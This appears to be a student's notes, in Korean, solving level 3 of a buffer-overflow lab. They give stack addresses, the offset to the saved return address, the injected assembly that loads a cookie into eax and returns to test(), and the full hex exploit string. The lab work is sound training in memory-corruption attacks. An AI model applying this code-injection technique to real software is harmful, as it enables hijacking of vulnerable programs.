test() 상에서

ebp = 0x556833a0
a0 33 68 55
----------------------------------
ebp = 0x55683370
(return) = (ebp+4)=(0x55683374)=0x08048c03
buf = ebp-0x28 = ebp-40=0x55683348

return + 4 =0x55683378
global_value = 0x804c20c
cookie = 0x7220cc64
----------------------------------
넣어야 하는 문자열의 길이
= buf 시작 ~ ebp ~ return(to return+4) ~ assembly program(start from return+4)
= 40+4+4+len(program)
= 48+len(program)
-----------------------------------
lv2와 달리 lv3는 getbuf를 실행한 뒤 test()로 다시 돌아간다.
따라서 ebp의 값을 test()의 ebp와 같게 해줘야 한다.

           0x556833a0 = ebp on test()
(40byte)+ (a0 33 68 55)
-----------------------------------------
return+4에 있는 프로그램을 실행해야 하므로
return에 들어가는 값은 return+4의 주소를 넣는다.

                   0x55683378
(40byte)+ (4byte)+(78 33 68 55)+(program)
----------------------------------------------
program은 아래와 같다.

00000000 <.text>:
0:   	68 03 8c 04 08          	push   $0x08048c03  #=test()로 돌아가는 주소
5:   	b8 64 cc 20 72          	mov    $0x7220cc64,%eax
a:   	c3                      	ret
----------------------------------------------

61 61 61 61 62 62 62 62 63 63 63 63 64 64 64 64 65 65 65 65 66 66 66 66 67 67 67 67 68 68 68 68 69 69 69 69 70 70 70 70 a0 33 68 55 78 33 68 55 68 03 8c 04 08 b8 64 cc 20 72 c3